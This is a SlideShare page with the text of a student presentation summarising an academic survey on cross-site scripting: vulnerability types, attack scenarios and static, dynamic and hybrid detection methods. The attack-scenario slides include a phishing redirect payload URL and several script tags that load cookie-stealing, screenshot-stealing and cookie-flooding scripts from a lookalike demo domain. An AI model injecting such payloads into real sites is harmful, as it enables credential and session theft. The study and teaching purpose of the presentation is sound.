SlideShare a Scribd company logo

A Survey of Exploitation and Detection Methods of XSS Vulnerabilities.pptx

Download as PPTX, PDF
G
Gitam Gadtaula

This document discusses cross-site scripting (XSS) vulnerabilities, including how they are classified and exploited. It analyzes the risks of XSS attacks such as phishing, stealing cookies, denial of service attacks, and spreading worms. The document also examines methods for detecting XSS vulnerabilities, dividing them into static, dynamic, and hybrid approaches. Hybrid methods leverage both static and dynamic analysis to detect vulnerabilities while achieving a low false positive rate. However, completely preventing XSS attacks requires comprehensively using multiple detection methods.

1 of 29
Download to read offline
A Survey of Exploitation and Detection Methods of XSS Vulnerabilities Miao Liu, Boyu Zhang, Wenbin Chen, Xunlai Zhang IEEE Access, Vol 7 A presentation by Gitam Gadtaula, Kathmandu University
Outlines ❖ Introduction ❖ Classification of XSS vulnerabilities ❖ Risks caused by exploiting XSS vulnerabilities ❖ Detection method of XSS Vulnerabilities ❖ Conclusion
Introduction ❖ A kind of vulnerabilities that can endanger web applications by injecting malicious code. ❖ The exploitation of XSS vulnerabilities can hijack users’ sessions, modify, read and delete business data of web applications, place malicious codes in web applications, and control victims to attack other targeted servers. ❖ Abbreviated as XSS to distinguish CSS. ❖ This paper discusses classification of XSS, and designs a demo website to demonstrate attack processes of common XSS exploitation scenarios. ❖ Also compares and analyzes recent research results on XSS detection, divides them into three categories; static, dynamic and hybrid.
❖ XSS can be traced back to the 1990s but Microsoft security engineers introduced the term "Cross-site scripting" in January 2000. ❖ The Internet security threat report in 2019 shows, phishing attacks and form hijacking caused by exploiting XSS vulnerabilities bring huge losses to enterprises. Symantec intercepted more than 3.7 million forms hijacking attacks in 2018. ❖ In 2006, Bantown, a hacker organization, exploited the discovered XSS vulnerabilities to invade LiveJournal which is an online community with 2 million active users. ❖ The attacker created a large number of URLs containing malicious code and lured users to click. When victims clicked these URLs, the attacker could get cookies from users and used these cookies to login the victims’ accounts.
THE CLASSIFICATION OF XSS VULNERABILITIES According to untrusted user supplied data included in an HTTP response generated by the server or is somewhere in the DOM of HTML pages, XSS vulnerabilities could be divided into server-side vulnerabilities and client-side vulnerabilities. The server-side XSS vulnerability mainly includes reflected XSS and stored XSS. The client-side vulnerability refers to DOM Based XSS.
DOM based XSS DOM Based XSS is also known as type-0 XSS. It is caused by unsafe client-side code rather than server-side code. This sort of vulnerability may occur on pages containing JavaScript code such as document.write() or eval(). The attacker creates a link with malicious JS code and sends it to the victim. When the victim clicks on the link, he will get a response without malicious code. The malicious code executes at the client side and the attacker can obtain sensitive information from the victim.
A Survey of Exploitation and Detection Methods of XSS Vulnerabilities.pptx
STORED XSS Stored XSS is also known as type-1 XSS. This kind of vulnerability is likely to occur in websites such as forums or blogs. The attacker puts the malicious code in his submissions to websites, and websites store these submissions in databases directly. When the victim browses these contents, the XSS attack will be triggered.
A Survey of Exploitation and Detection Methods of XSS Vulnerabilities.pptx
Reflected XSS Reflected XSS is also known as type-2 XSS. The process of reflected XSS attack is similar with DOM Based XSS, and the difference is that malicious code is included in the response of websites. Attackers usually insert malicious scripts into a URL and lure users to click on it. When the victim clicks on the link, he will get the response with malicious code from the website. The attacker will get sensitive data through malicious code execution. Unlike DOM Based XSS vulnerabilities, reflected XSS is a server-side vulnerability. Malicious code is parsed at the server-side rather than at the client-side.
A Survey of Exploitation and Detection Methods of XSS Vulnerabilities.pptx
RISKS CAUSED BY EXPLOITING XSS VULNERABILITIES In this section, authors created a demo website to illustrate how to exploit XSS vulnerabilities. The demo website is deployed locally and the domain name is www.phpbegin.local
A. PHISHING ATTACK Authors created a malicious website (http://www. phpbegim.local) with the same login display effect with our demonstrated website (http://www.phpbegin.local). It’s worth noting that URLs are the same except for one letter. Then they forged a malicious link (http://www.phpbegin.local/login.php?userName=<script>window.location.href=’’www. phpbegim.local/login.php’’;</script>&password=&submit=), sent it to a user via email and lured the user to click on it. When the user clicked the malicious link, the user entered his username and password and clicked the login button. Authors used the code to redirect the user to the normal website, and stored his username and password in the database. The user logged in the website normally without being aware that his username and password had been stolen.
A Survey of Exploitation and Detection Methods of XSS Vulnerabilities.pptx
B. Steal cookies The attacker stores a file cookis.js including some malicious code in the directory /myjs of the malicious website and then posts some submission including <script src="http://www.phpbegim.local/myjs/cookis.js"></script> to the demonstrated website. When users access the pages containing the above submission, the demonstrated website will send responses to users. The malicious code will be executed and the attacker will receive users’ cookies. In the end, the attacker can use some penetration test tool to replace his cookie value with the stolen cookie value, and then he can login in the demonstrated website by counterfeiting users.
A Survey of Exploitation and Detection Methods of XSS Vulnerabilities.pptx
C. DOS attack The attacker stores a file dos.js in the directory /myjs of the malicious website, and then posts some submission including <script src="http://www.phpbegim.local/myjs/dos.js"></script> to the demonstrated website. The dos.js code will insert large invalid data to cookies. When users access the pages containing the attacker’s submission, the malicious code is executed, and a lot of invalid data is injected into users’ cookies. When users browse the demonstrated website again, they will get 400 errors, because the website cannot parse cookies which have a large amount invalid data.
A Survey of Exploitation and Detection Methods of XSS Vulnerabilities.pptx
D. DDOS Attack In 2014, Incapsula, the Japan’s cloud security service provider, reported a Stored XSS in one of the world’s largest video websites. The attacker inserted malicious JavaScript code into <img> tag of a user’s custom avatar and published a lot of comments on many videos with the custom avatar. When legitimate users browsed these videos, the malicious code was executed and added a hidden <iframe> tag with a tool based Ajax script that can send a request to the targeted server per second. The more users watched these videos, the more requests were sent to the targeted server, which in turn caused the targeted server to exhaust all resources and not respond to normal user requests any more.
A Survey of Exploitation and Detection Methods of XSS Vulnerabilities.pptx
E. Stealing Browsers screenshot The attacker stores a file shot.js in the directory /myjs of the malicious website, and then posts some submission including <script src="http://www.phpbegim.local/myjs/shot.js"> </script> to the demonstrated website. The shot.js code will copy and send victim’s screenshots to the malicious website. When users access the pages containing the attacker’s submission, the script takes a screenshot of the browser, sends it back to the malicious website. The attacker can then decode the received data to view the image.
A Survey of Exploitation and Detection Methods of XSS Vulnerabilities.pptx
F. XSS Worms XSS Worm is a malicious (or sometimes non-malicious) payload, that breaches browser security to propagate among visitors of a website in the attempt to progressively infect other visitor. In 2011, Sina Weibo, a similar website with Twitter in China, received an attack from a XSS worm. Once the user was attacked by the worm, the user would automatically send some microblogs to their fans to entice them to click. Once fans clicked on this Weibo to view the details, they would be infected and repeated the above steps, which would cause the worm to spread quickly.
A Survey of Exploitation and Detection Methods of XSS Vulnerabilities.pptx
Detection method of XSS Vulnerabilities ❖ Different detection methods have different analysis mechanisms ➢ Static analysis ➢ Dynamic analysis ➢ Hybrid analysis
A Survey of Exploitation and Detection Methods of XSS Vulnerabilities.pptx
A Survey of Exploitation and Detection Methods of XSS Vulnerabilities.pptx
Hybrid Analysis Hybrid analysis methods have the advantages of static analysis and dynamic analysis. They can not only detect all paths in the source code, but also get low false positive rate. In hybrid analysis, static analysis are used to find potential vulnerabilities in applications and improve the detection speed. Dynamic analysis are mainly used to verify XSS vulnerabilities. However, hybrid analysis methods also inherit the shortcomings of static analysis. Some of the hybrid analysis methods can only be applied to a single language, which makes them not very popular.
Conclusion ❖ XSS vulnerabilities are mainly caused by not properly filtering users’ inputs, such as the wrong order in which the encoding function is applied ❖ Although there are many methods to detect XSS vulnerabilities, it is still a very difficult task to detect all XSS vulnerabilities in one web application. This is mainly because the size of web applications is becoming larger, and the calling logic among modules is also becoming more complicated. ❖ The methods discussed in this paper have their own advantages and disadvantages, and so far there has not been a perfect method. ❖ Therefore, if a web application needs to prevent XSS vulnerability attack perfectly, multiple methods must be used comprehensively.
Ad

Recommended

Cross Site Scripting
Cross Site ScriptingCross Site Scripting
Cross Site Scripting
Ali Mattash
 
Xss ppt
Xss pptXss ppt
Xss ppt
penetration Tester
 
XSS.pdf
XSS.pdfXSS.pdf
XSS.pdf
Okan YILDIZ
 
XSS.pdf
XSS.pdfXSS.pdf
XSS.pdf
Okan YILDIZ
 
Cross Site Scripting Defense Presentation
Cross Site Scripting Defense Presentation Cross Site Scripting Defense Presentation
Cross Site Scripting Defense Presentation
Ikhade Maro Igbape
 
Cm7 secure code_training_1day_xss
Cm7 secure code_training_1day_xssCm7 secure code_training_1day_xss
Cm7 secure code_training_1day_xss
dcervigni
 
Study of Cross-Site Scripting Attacks and Their Countermeasures
Study of Cross-Site Scripting Attacks and Their CountermeasuresStudy of Cross-Site Scripting Attacks and Their Countermeasures
Study of Cross-Site Scripting Attacks and Their Countermeasures
Editor IJCATR
 
Cross Site Scripting(XSS)
Cross Site Scripting(XSS)Cross Site Scripting(XSS)
Cross Site Scripting(XSS)
Nabin Dutta
 
HallTumserFinalPaper
HallTumserFinalPaperHallTumserFinalPaper
HallTumserFinalPaper
Daniel Tumser
 
Xss attack
Xss attackXss attack
Xss attack
Manjushree Mashal
 
IRJET- A Survey on Various Cross-Site Scripting Attacks and Few Prevention Ap...
IRJET- A Survey on Various Cross-Site Scripting Attacks and Few Prevention Ap...IRJET- A Survey on Various Cross-Site Scripting Attacks and Few Prevention Ap...
IRJET- A Survey on Various Cross-Site Scripting Attacks and Few Prevention Ap...
IRJET Journal
 
Reflective and Stored XSS- Cross Site Scripting
Reflective and Stored XSS- Cross Site ScriptingReflective and Stored XSS- Cross Site Scripting
Reflective and Stored XSS- Cross Site Scripting
InMobi Technology
 
Web Vulnerabilities And Exploitation - Compromising The Web
Web Vulnerabilities And Exploitation - Compromising The WebWeb Vulnerabilities And Exploitation - Compromising The Web
Web Vulnerabilities And Exploitation - Compromising The Web
Zero Science Lab
 
ImageSubXSS: an image substitute technique to prevent Cross-Site Scripting at...
ImageSubXSS: an image substitute technique to prevent Cross-Site Scripting at...ImageSubXSS: an image substitute technique to prevent Cross-Site Scripting at...
ImageSubXSS: an image substitute technique to prevent Cross-Site Scripting at...
IJECEIAES
 
SeanRobertsThesis
SeanRobertsThesisSeanRobertsThesis
SeanRobertsThesis
Sean Roberts
 
Session7-XSS & CSRF
Session7-XSS & CSRFSession7-XSS & CSRF
Session7-XSS & CSRF
zakieh alizadeh
 
Secure Code Warrior - Cross site scripting
Secure Code Warrior - Cross site scriptingSecure Code Warrior - Cross site scripting
Secure Code Warrior - Cross site scripting
Secure Code Warrior
 
Deep understanding on Cross-Site Scripting and SQL Injection
Deep understanding on Cross-Site Scripting and SQL InjectionDeep understanding on Cross-Site Scripting and SQL Injection
Deep understanding on Cross-Site Scripting and SQL Injection
Vishal Kumar
 
CROSS SITE SCRIPTING.ppt
CROSS SITE SCRIPTING.pptCROSS SITE SCRIPTING.ppt
CROSS SITE SCRIPTING.ppt
yashvirsingh48
 
Prevention of Cross-Site Scripting using Hash Technique
Prevention of Cross-Site Scripting using Hash TechniquePrevention of Cross-Site Scripting using Hash Technique
Prevention of Cross-Site Scripting using Hash Technique
IJCSIS Research Publications
 
Cross site scripting
Cross site scriptingCross site scripting
Cross site scripting
n|u - The Open Security Community
 
XSeyeyeyeyeyeyeyeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeS.pptx
XSeyeyeyeyeyeyeyeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeS.pptxXSeyeyeyeyeyeyeyeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeS.pptx
XSeyeyeyeyeyeyeyeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeS.pptx
VikasTuwar1
 
Web hacking refers to exploitation of applications via HTTP which can be done
Web hacking refers to exploitation of applications via HTTP which can be doneWeb hacking refers to exploitation of applications via HTTP which can be done
Web hacking refers to exploitation of applications via HTTP which can be done
ssuserf8636d
 
Web Application Security
Web Application SecurityWeb Application Security
Web Application Security
Chris Hillman
 
STORED XSS IN DVWA
STORED XSS IN DVWASTORED XSS IN DVWA
STORED XSS IN DVWA
Rutvik patel
 
Cross site scripting
Cross site scripting Cross site scripting
Cross site scripting
Bilal Mazhar MS(IS)Cyber Security II Privacy Professional
 
Xss_Hritwik_Roy.pptx@kjfbbwefhjoiqrw[i0-3envnvig87trhgohiulefvonvrivfgkmlghoi...
Xss_Hritwik_Roy.pptx@kjfbbwefhjoiqrw[i0-3envnvig87trhgohiulefvonvrivfgkmlghoi...Xss_Hritwik_Roy.pptx@kjfbbwefhjoiqrw[i0-3envnvig87trhgohiulefvonvrivfgkmlghoi...
Xss_Hritwik_Roy.pptx@kjfbbwefhjoiqrw[i0-3envnvig87trhgohiulefvonvrivfgkmlghoi...
jafixew160
 
Cross Site Scripting ( XSS)
Cross Site Scripting ( XSS)Cross Site Scripting ( XSS)
Cross Site Scripting ( XSS)
Amit Tyagi
 
DNS Resolvers and Nameservers (in New Zealand)
DNS Resolvers and Nameservers (in New Zealand)DNS Resolvers and Nameservers (in New Zealand)
DNS Resolvers and Nameservers (in New Zealand)
APNIC
 
Top Vancouver Green Business Ideas for 2025 Powered by 4GoodHosting
Top Vancouver Green Business Ideas for 2025 Powered by 4GoodHostingTop Vancouver Green Business Ideas for 2025 Powered by 4GoodHosting
Top Vancouver Green Business Ideas for 2025 Powered by 4GoodHosting
steve198109
 
Ad

More Related Content

Similar to A Survey of Exploitation and Detection Methods of XSS Vulnerabilities.pptx (20)

HallTumserFinalPaper
HallTumserFinalPaperHallTumserFinalPaper
HallTumserFinalPaper
Daniel Tumser
 
Xss attack
Xss attackXss attack
Xss attack
Manjushree Mashal
 
IRJET- A Survey on Various Cross-Site Scripting Attacks and Few Prevention Ap...
IRJET- A Survey on Various Cross-Site Scripting Attacks and Few Prevention Ap...IRJET- A Survey on Various Cross-Site Scripting Attacks and Few Prevention Ap...
IRJET- A Survey on Various Cross-Site Scripting Attacks and Few Prevention Ap...
IRJET Journal
 
Reflective and Stored XSS- Cross Site Scripting
Reflective and Stored XSS- Cross Site ScriptingReflective and Stored XSS- Cross Site Scripting
Reflective and Stored XSS- Cross Site Scripting
InMobi Technology
 
Web Vulnerabilities And Exploitation - Compromising The Web
Web Vulnerabilities And Exploitation - Compromising The WebWeb Vulnerabilities And Exploitation - Compromising The Web
Web Vulnerabilities And Exploitation - Compromising The Web
Zero Science Lab
 
ImageSubXSS: an image substitute technique to prevent Cross-Site Scripting at...
ImageSubXSS: an image substitute technique to prevent Cross-Site Scripting at...ImageSubXSS: an image substitute technique to prevent Cross-Site Scripting at...
ImageSubXSS: an image substitute technique to prevent Cross-Site Scripting at...
IJECEIAES
 
SeanRobertsThesis
SeanRobertsThesisSeanRobertsThesis
SeanRobertsThesis
Sean Roberts
 
Session7-XSS & CSRF
Session7-XSS & CSRFSession7-XSS & CSRF
Session7-XSS & CSRF
zakieh alizadeh
 
Secure Code Warrior - Cross site scripting
Secure Code Warrior - Cross site scriptingSecure Code Warrior - Cross site scripting
Secure Code Warrior - Cross site scripting
Secure Code Warrior
 
Deep understanding on Cross-Site Scripting and SQL Injection
Deep understanding on Cross-Site Scripting and SQL InjectionDeep understanding on Cross-Site Scripting and SQL Injection
Deep understanding on Cross-Site Scripting and SQL Injection
Vishal Kumar
 
CROSS SITE SCRIPTING.ppt
CROSS SITE SCRIPTING.pptCROSS SITE SCRIPTING.ppt
CROSS SITE SCRIPTING.ppt
yashvirsingh48
 
Prevention of Cross-Site Scripting using Hash Technique
Prevention of Cross-Site Scripting using Hash TechniquePrevention of Cross-Site Scripting using Hash Technique
Prevention of Cross-Site Scripting using Hash Technique
IJCSIS Research Publications
 
Cross site scripting
Cross site scriptingCross site scripting
Cross site scripting
n|u - The Open Security Community
 
XSeyeyeyeyeyeyeyeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeS.pptx
XSeyeyeyeyeyeyeyeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeS.pptxXSeyeyeyeyeyeyeyeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeS.pptx
XSeyeyeyeyeyeyeyeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeS.pptx
VikasTuwar1
 
Web hacking refers to exploitation of applications via HTTP which can be done
Web hacking refers to exploitation of applications via HTTP which can be doneWeb hacking refers to exploitation of applications via HTTP which can be done
Web hacking refers to exploitation of applications via HTTP which can be done
ssuserf8636d
 
Web Application Security
Web Application SecurityWeb Application Security
Web Application Security
Chris Hillman
 
STORED XSS IN DVWA
STORED XSS IN DVWASTORED XSS IN DVWA
STORED XSS IN DVWA
Rutvik patel
 
Cross site scripting
Cross site scripting Cross site scripting
Cross site scripting
Bilal Mazhar MS(IS)Cyber Security II Privacy Professional
 
Xss_Hritwik_Roy.pptx@kjfbbwefhjoiqrw[i0-3envnvig87trhgohiulefvonvrivfgkmlghoi...
Xss_Hritwik_Roy.pptx@kjfbbwefhjoiqrw[i0-3envnvig87trhgohiulefvonvrivfgkmlghoi...Xss_Hritwik_Roy.pptx@kjfbbwefhjoiqrw[i0-3envnvig87trhgohiulefvonvrivfgkmlghoi...
Xss_Hritwik_Roy.pptx@kjfbbwefhjoiqrw[i0-3envnvig87trhgohiulefvonvrivfgkmlghoi...
jafixew160
 
Cross Site Scripting ( XSS)
Cross Site Scripting ( XSS)Cross Site Scripting ( XSS)
Cross Site Scripting ( XSS)
Amit Tyagi
 
HallTumserFinalPaper
HallTumserFinalPaperHallTumserFinalPaper
HallTumserFinalPaper
Daniel Tumser
 
Xss attack
Xss attackXss attack
Xss attack
Manjushree Mashal
 
IRJET- A Survey on Various Cross-Site Scripting Attacks and Few Prevention Ap...
IRJET- A Survey on Various Cross-Site Scripting Attacks and Few Prevention Ap...IRJET- A Survey on Various Cross-Site Scripting Attacks and Few Prevention Ap...
IRJET- A Survey on Various Cross-Site Scripting Attacks and Few Prevention Ap...
IRJET Journal
 
Reflective and Stored XSS- Cross Site Scripting
Reflective and Stored XSS- Cross Site ScriptingReflective and Stored XSS- Cross Site Scripting
Reflective and Stored XSS- Cross Site Scripting
InMobi Technology
 
Web Vulnerabilities And Exploitation - Compromising The Web
Web Vulnerabilities And Exploitation - Compromising The WebWeb Vulnerabilities And Exploitation - Compromising The Web
Web Vulnerabilities And Exploitation - Compromising The Web
Zero Science Lab
 
ImageSubXSS: an image substitute technique to prevent Cross-Site Scripting at...
ImageSubXSS: an image substitute technique to prevent Cross-Site Scripting at...ImageSubXSS: an image substitute technique to prevent Cross-Site Scripting at...
ImageSubXSS: an image substitute technique to prevent Cross-Site Scripting at...
IJECEIAES
 
SeanRobertsThesis
SeanRobertsThesisSeanRobertsThesis
SeanRobertsThesis
Sean Roberts
 
Session7-XSS & CSRF
Session7-XSS & CSRFSession7-XSS & CSRF
Session7-XSS & CSRF
zakieh alizadeh
 
Secure Code Warrior - Cross site scripting
Secure Code Warrior - Cross site scriptingSecure Code Warrior - Cross site scripting
Secure Code Warrior - Cross site scripting
Secure Code Warrior
 
Deep understanding on Cross-Site Scripting and SQL Injection
Deep understanding on Cross-Site Scripting and SQL InjectionDeep understanding on Cross-Site Scripting and SQL Injection
Deep understanding on Cross-Site Scripting and SQL Injection
Vishal Kumar
 
CROSS SITE SCRIPTING.ppt
CROSS SITE SCRIPTING.pptCROSS SITE SCRIPTING.ppt
CROSS SITE SCRIPTING.ppt
yashvirsingh48
 
Prevention of Cross-Site Scripting using Hash Technique
Prevention of Cross-Site Scripting using Hash TechniquePrevention of Cross-Site Scripting using Hash Technique
Prevention of Cross-Site Scripting using Hash Technique
IJCSIS Research Publications
 
Cross site scripting
Cross site scriptingCross site scripting
Cross site scripting
n|u - The Open Security Community
 
XSeyeyeyeyeyeyeyeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeS.pptx
XSeyeyeyeyeyeyeyeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeS.pptxXSeyeyeyeyeyeyeyeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeS.pptx
XSeyeyeyeyeyeyeyeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeS.pptx
VikasTuwar1
 
Web hacking refers to exploitation of applications via HTTP which can be done
Web hacking refers to exploitation of applications via HTTP which can be doneWeb hacking refers to exploitation of applications via HTTP which can be done
Web hacking refers to exploitation of applications via HTTP which can be done
ssuserf8636d
 
Web Application Security
Web Application SecurityWeb Application Security
Web Application Security
Chris Hillman
 
STORED XSS IN DVWA
STORED XSS IN DVWASTORED XSS IN DVWA
STORED XSS IN DVWA
Rutvik patel
 
Cross site scripting
Cross site scripting Cross site scripting
Cross site scripting
Bilal Mazhar MS(IS)Cyber Security II Privacy Professional
 
Xss_Hritwik_Roy.pptx@kjfbbwefhjoiqrw[i0-3envnvig87trhgohiulefvonvrivfgkmlghoi...
Xss_Hritwik_Roy.pptx@kjfbbwefhjoiqrw[i0-3envnvig87trhgohiulefvonvrivfgkmlghoi...Xss_Hritwik_Roy.pptx@kjfbbwefhjoiqrw[i0-3envnvig87trhgohiulefvonvrivfgkmlghoi...
Xss_Hritwik_Roy.pptx@kjfbbwefhjoiqrw[i0-3envnvig87trhgohiulefvonvrivfgkmlghoi...
jafixew160
 
Cross Site Scripting ( XSS)
Cross Site Scripting ( XSS)Cross Site Scripting ( XSS)
Cross Site Scripting ( XSS)
Amit Tyagi
 

Recently uploaded (19)

DNS Resolvers and Nameservers (in New Zealand)
DNS Resolvers and Nameservers (in New Zealand)DNS Resolvers and Nameservers (in New Zealand)
DNS Resolvers and Nameservers (in New Zealand)
APNIC
 
Top Vancouver Green Business Ideas for 2025 Powered by 4GoodHosting
Top Vancouver Green Business Ideas for 2025 Powered by 4GoodHostingTop Vancouver Green Business Ideas for 2025 Powered by 4GoodHosting
Top Vancouver Green Business Ideas for 2025 Powered by 4GoodHosting
steve198109
 
Reliable Vancouver Web Hosting with Local Servers & 24/7 Support
Reliable Vancouver Web Hosting with Local Servers & 24/7 SupportReliable Vancouver Web Hosting with Local Servers & 24/7 Support
Reliable Vancouver Web Hosting with Local Servers & 24/7 Support
steve198109
 
(Hosting PHising Sites) for Cryptography and network security
(Hosting PHising Sites) for Cryptography and network security(Hosting PHising Sites) for Cryptography and network security
(Hosting PHising Sites) for Cryptography and network security
aluacharya169
 
IT Services Workflow From Request to Resolution
IT Services Workflow From Request to ResolutionIT Services Workflow From Request to Resolution
IT Services Workflow From Request to Resolution
mzmziiskd
 
project_based_laaaaaaaaaaearning,kelompok 10.pptx
project_based_laaaaaaaaaaearning,kelompok 10.pptxproject_based_laaaaaaaaaaearning,kelompok 10.pptx
project_based_laaaaaaaaaaearning,kelompok 10.pptx
redzuriel13
 
Perguntas dos animais - Slides ilustrados de múltipla escolha
Perguntas dos animais - Slides ilustrados de múltipla escolhaPerguntas dos animais - Slides ilustrados de múltipla escolha
Perguntas dos animais - Slides ilustrados de múltipla escolha
socaslev
 
Determining Glass is mechanical textile
Determining Glass is mechanical textileDetermining Glass is mechanical textile
Determining Glass is mechanical textile
Azizul Hakim
 
APNIC Update, presented at NZNOG 2025 by Terry Sweetser
APNIC Update, presented at NZNOG 2025 by Terry SweetserAPNIC Update, presented at NZNOG 2025 by Terry Sweetser
APNIC Update, presented at NZNOG 2025 by Terry Sweetser
APNIC
 
highend-srxseries-services-gateways-customer-presentation.pptx
highend-srxseries-services-gateways-customer-presentation.pptxhighend-srxseries-services-gateways-customer-presentation.pptx
highend-srxseries-services-gateways-customer-presentation.pptx
elhadjcheikhdiop
 
OSI TCP IP Protocol Layers description f
OSI TCP IP Protocol Layers description fOSI TCP IP Protocol Layers description f
OSI TCP IP Protocol Layers description f
cbr49917
 
APNIC -Policy Development Process, presented at Local APIGA Taiwan 2025
APNIC -Policy Development Process, presented at Local APIGA Taiwan 2025APNIC -Policy Development Process, presented at Local APIGA Taiwan 2025
APNIC -Policy Development Process, presented at Local APIGA Taiwan 2025
APNIC
 
Mobile database for your company telemarketing or sms marketing campaigns. Fr...
Mobile database for your company telemarketing or sms marketing campaigns. Fr...Mobile database for your company telemarketing or sms marketing campaigns. Fr...
Mobile database for your company telemarketing or sms marketing campaigns. Fr...
DataProvider1
 
Understanding the Tor Network and Exploring the Deep Web
Understanding the Tor Network and Exploring the Deep WebUnderstanding the Tor Network and Exploring the Deep Web
Understanding the Tor Network and Exploring the Deep Web
nabilajabin35
 
Computers Networks Computers Networks Computers Networks
Computers Networks Computers Networks Computers NetworksComputers Networks Computers Networks Computers Networks
Computers Networks Computers Networks Computers Networks
Tito208863
 
Best web hosting Vancouver 2025 for you business
Best web hosting Vancouver 2025 for you businessBest web hosting Vancouver 2025 for you business
Best web hosting Vancouver 2025 for you business
steve198109
 
White and Red Clean Car Business Pitch Presentation.pptx
White and Red Clean Car Business Pitch Presentation.pptxWhite and Red Clean Car Business Pitch Presentation.pptx
White and Red Clean Car Business Pitch Presentation.pptx
canumatown
 
Smart Mobile App Pitch Deck丨AI Travel App Presentation Template
Smart Mobile App Pitch Deck丨AI Travel App Presentation TemplateSmart Mobile App Pitch Deck丨AI Travel App Presentation Template
Smart Mobile App Pitch Deck丨AI Travel App Presentation Template
yojeari421237
 
5-Proses-proses Akuisisi Citra Digital.pptx
5-Proses-proses Akuisisi Citra Digital.pptx5-Proses-proses Akuisisi Citra Digital.pptx
5-Proses-proses Akuisisi Citra Digital.pptx
andani26
 
DNS Resolvers and Nameservers (in New Zealand)
DNS Resolvers and Nameservers (in New Zealand)DNS Resolvers and Nameservers (in New Zealand)
DNS Resolvers and Nameservers (in New Zealand)
APNIC
 
Top Vancouver Green Business Ideas for 2025 Powered by 4GoodHosting
Top Vancouver Green Business Ideas for 2025 Powered by 4GoodHostingTop Vancouver Green Business Ideas for 2025 Powered by 4GoodHosting
Top Vancouver Green Business Ideas for 2025 Powered by 4GoodHosting
steve198109
 
Reliable Vancouver Web Hosting with Local Servers & 24/7 Support
Reliable Vancouver Web Hosting with Local Servers & 24/7 SupportReliable Vancouver Web Hosting with Local Servers & 24/7 Support
Reliable Vancouver Web Hosting with Local Servers & 24/7 Support
steve198109
 
(Hosting PHising Sites) for Cryptography and network security
(Hosting PHising Sites) for Cryptography and network security(Hosting PHising Sites) for Cryptography and network security
(Hosting PHising Sites) for Cryptography and network security
aluacharya169
 
IT Services Workflow From Request to Resolution
IT Services Workflow From Request to ResolutionIT Services Workflow From Request to Resolution
IT Services Workflow From Request to Resolution
mzmziiskd
 
project_based_laaaaaaaaaaearning,kelompok 10.pptx
project_based_laaaaaaaaaaearning,kelompok 10.pptxproject_based_laaaaaaaaaaearning,kelompok 10.pptx
project_based_laaaaaaaaaaearning,kelompok 10.pptx
redzuriel13
 
Perguntas dos animais - Slides ilustrados de múltipla escolha
Perguntas dos animais - Slides ilustrados de múltipla escolhaPerguntas dos animais - Slides ilustrados de múltipla escolha
Perguntas dos animais - Slides ilustrados de múltipla escolha
socaslev
 
Determining Glass is mechanical textile
Determining Glass is mechanical textileDetermining Glass is mechanical textile
Determining Glass is mechanical textile
Azizul Hakim
 
APNIC Update, presented at NZNOG 2025 by Terry Sweetser
APNIC Update, presented at NZNOG 2025 by Terry SweetserAPNIC Update, presented at NZNOG 2025 by Terry Sweetser
APNIC Update, presented at NZNOG 2025 by Terry Sweetser
APNIC
 
highend-srxseries-services-gateways-customer-presentation.pptx
highend-srxseries-services-gateways-customer-presentation.pptxhighend-srxseries-services-gateways-customer-presentation.pptx
highend-srxseries-services-gateways-customer-presentation.pptx
elhadjcheikhdiop
 
OSI TCP IP Protocol Layers description f
OSI TCP IP Protocol Layers description fOSI TCP IP Protocol Layers description f
OSI TCP IP Protocol Layers description f
cbr49917
 
APNIC -Policy Development Process, presented at Local APIGA Taiwan 2025
APNIC -Policy Development Process, presented at Local APIGA Taiwan 2025APNIC -Policy Development Process, presented at Local APIGA Taiwan 2025
APNIC -Policy Development Process, presented at Local APIGA Taiwan 2025
APNIC
 
Mobile database for your company telemarketing or sms marketing campaigns. Fr...
Mobile database for your company telemarketing or sms marketing campaigns. Fr...Mobile database for your company telemarketing or sms marketing campaigns. Fr...
Mobile database for your company telemarketing or sms marketing campaigns. Fr...
DataProvider1
 
Understanding the Tor Network and Exploring the Deep Web
Understanding the Tor Network and Exploring the Deep WebUnderstanding the Tor Network and Exploring the Deep Web
Understanding the Tor Network and Exploring the Deep Web
nabilajabin35
 
Computers Networks Computers Networks Computers Networks
Computers Networks Computers Networks Computers NetworksComputers Networks Computers Networks Computers Networks
Computers Networks Computers Networks Computers Networks
Tito208863
 
Best web hosting Vancouver 2025 for you business
Best web hosting Vancouver 2025 for you businessBest web hosting Vancouver 2025 for you business
Best web hosting Vancouver 2025 for you business
steve198109
 
White and Red Clean Car Business Pitch Presentation.pptx
White and Red Clean Car Business Pitch Presentation.pptxWhite and Red Clean Car Business Pitch Presentation.pptx
White and Red Clean Car Business Pitch Presentation.pptx
canumatown
 
Smart Mobile App Pitch Deck丨AI Travel App Presentation Template
Smart Mobile App Pitch Deck丨AI Travel App Presentation TemplateSmart Mobile App Pitch Deck丨AI Travel App Presentation Template
Smart Mobile App Pitch Deck丨AI Travel App Presentation Template
yojeari421237
 
5-Proses-proses Akuisisi Citra Digital.pptx
5-Proses-proses Akuisisi Citra Digital.pptx5-Proses-proses Akuisisi Citra Digital.pptx
5-Proses-proses Akuisisi Citra Digital.pptx
andani26
 
Ad

A Survey of Exploitation and Detection Methods of XSS Vulnerabilities.pptx

